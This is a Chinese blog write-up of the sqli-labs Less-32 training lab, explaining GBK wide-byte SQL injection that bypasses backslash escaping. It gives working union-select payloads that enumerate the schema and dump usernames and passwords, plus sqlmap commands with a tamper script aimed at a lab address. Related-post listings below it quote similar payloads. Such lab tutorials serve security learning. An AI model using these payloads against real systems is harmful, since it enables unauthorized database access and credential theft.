sqli-Lesson32 宽字节注入题解

于 2024-01-12 23:31:28 发布
阅读量1k 收藏 19
点赞数 28
分类专栏: ctf题解 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65240014/article/details/135554152
版权

打开sqli第32节,这题是宽字节注入。

首先了解一下什么是宽字节:

如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节

  • 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节
  • 英文默认占一个字节,中文占两个字节

宽字节注入产生的原因如下:

宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)

GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),例如%df和%5C会结合;GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c

假如我们直接输入1‘。

可以看到单引号被反斜线转义,使单引号失效。若是改成1%df%5c,在sql进行gbk编码的时候会将%df和%5c作为一个宽字节进行解码,就会变成汉字“”,这个字符网页中显示不出来就变成了一个?符,结果如下图所示。(实际上宽字节只要大于ascii码的128的上限也就是0x80就能显示这个扩展字符你换成%81也是可以的,主要目的就是让sql误将两个单字节识别为宽字节)

下面可以开始注入了

输入1%81%27%20and%201=2%20union%20select%201,database(),version()--+

获取数据库名称和版本信息

我们得知数据库名为security

但是直接输入会出错,它不识别security这个字符

查看源码可以发现,后端对id进行十六进制解码,也就是说需要把security转为十六进制。

换为十六进制后

输入1%df%27 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479--+

获得三个表名

emails,referers,uagents,users

查询users表的字段

输入1%df%27 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

然后导出数据

输入1%df%27 and 1=2 union select 1,group_concat(0x7c,username,0x7c,password,0x7c),3 from users--+

0x7c->| 是作为特征划分用的字符,方便区分账号和密码。

使用sqlmap的宽字节注入进行sql注入

sqlmap -u "http://192.168.2.13:7766/Less-32/?id=1"  --dbms mysql --tamper "unmagicquotes.py" -v 3 --batch -dbs 

可以看到爆出了上面一样security库

使用

sqlmap -u "http://192.168.2.13:7766/Less-32/?id=1"  --dbms mysql --tamper "unmagicquotes.py" -v 3 --batch -D security --tables

爆出表,结果如下:

使用

sqlmap -u "http://192.168.2.13:7766/Less-32/?id=1"  --dbms mysql --tamper "unmagicquotes.py" -v 3 --batch -D security -T users --column 

爆出字段,结果如下:

最后使用

sqlmap -u "http://192.168.2.13:7766/Less-32/?id=1"  --dbms mysql --tamper "unmagicquotes.py" -v 3 --batch -D security -T users --dump

爆出表中的内容,与上面手操的一样。

The Theory OF God
关注
专栏目录
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 712
继续学习sqli-labs,本篇是less 32-37
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1847
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli-labs靶场实现(九)【宽字节注入(1)、宽字节注入(2)】(less-33、less-32具体步骤+图文详解)
weixin_46709219的博客
01-03 1206
一)宽字节注入 1)宽字节注入基础 2)宽字节注入代码分析 3)宽字节SQL注入演示 4)sqlmap安全检测 —————————————————————————————————————————————————————— 一)宽字节注入 1)宽字节注入基础 GBK编码是占用两个字节,ASCII编码是占用一个字节。在PHP中的编码方式为GBK,在函数执行添加的是ASCII编码,在mysql中国默认字符集是GBK等宽字节字符集(GBK属于宽字符集中的一种),而mysql中使用的默认的GBK编码方式是导致宽字
1-35关精选篇
weixin_44110913的博客
05-17 1197
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。   目录 Page-1(Basic Challenges) Less-1 GET - Error b...
sqli32关:宽字节注入
dirich的博客
06-13 421
宽字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
在一个宽字节注入的情况下得到的知识集合
zezai3010的博客
12-13 960
一、数据库schema的解释 数据库中Schema和Database有什么区别 - 人生似烟的日志 - 网易博客 http://blog.163.com/baibai_zheng/blog/static/51980755201022125325689/ 在MySQL中创建一个Schema好像就跟创建一个Database是一样的效果,在SQL Server和Orcal数据库中好像又不一样. 目
宽字节注入实例
七月_的博客
08-09 2111
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是宽字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
phpstudy+靶场sqli-labs-master下载
11-08
【标】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
宽字节注入
qq_43641094的博客
01-25 362
记录一次由做而引发的一次学习记录 这个md的来源是我之前做南邮的一道sql注入目,我实在是调动目前所学的sql注入知识没做出来,一直搞不懂将 ’ 转义为 ’ ,因此去网上看了一下wp,是考宽字节注入,于是在网上找了教程学习一下,这个文章只是为了记录一下自己的学习过程,不喜勿喷,有错希望指正 宽字节注入成因 宽字节注入指的是mysql数据库在使用宽字节(GBK)编码时,会认为两个字符是一个...
宽字节注入(靶场)
qq_39416206的博客
03-11 274
宽字节注入
sqli-宽字节注入
weixin_47346400的博客
03-16 179
以下ppt来自大佬传送门 宽字节注入原理 初步探测: http://sqli-labs:65/Less-32/?id=1'-- 发现1’被转义为 ''所以判定为 宽字节注入 方法:在注入点后键入%df,然后按照正常的注入流程开始注入 原理:下图中的hint == -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 ‘$id’产生闭合,所以就自然执行了 union select… 已知mysql注入的类型是宽字节了,下面就按照注入的基本
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3884
SQL注入–宽字节注入实践
sqli-labs————Less-34(宽字节绕过、水平越权、盲注)
Fly_鹏程万里
05-19 2615
Less-34方法一:这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
(手工)【sqli-labs35】宽字节、数字型、编码、报错注入
07-14 768
SQL-宽字节、编码、数字型注入】
Sqli-labs Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-10 2223
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs 原理 mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在...
sqli-lib-(32) 宽字节注入
qq_44133136的博客
07-29 630
sqli宽字节注入
sqli-labs————宽字节注入(可以用于绕过滤了单引号或者\的WAF)
Fly_鹏程万里
05-19 2638
宽字节注入的原理:原理:mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \' 。宽字节注入实现:因此我们在此想办法将 ' 前面添加的 \ 除掉,一般有两种思路:(1)%df吃掉 \ 具体的原因是urlencode('\) = %5c%27,我们在%5c%...
sqli-labs宽字节注入关卡
09-27
sqli-labs宽字节注入关卡是指在sqli-labs闯关中的相关关卡,用于学习和理解宽字节注入漏洞。它是通过将character_set_client设置为binary来解决宽字节或多字节问的方法,从而有效避免宽字符注入。通过使用工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值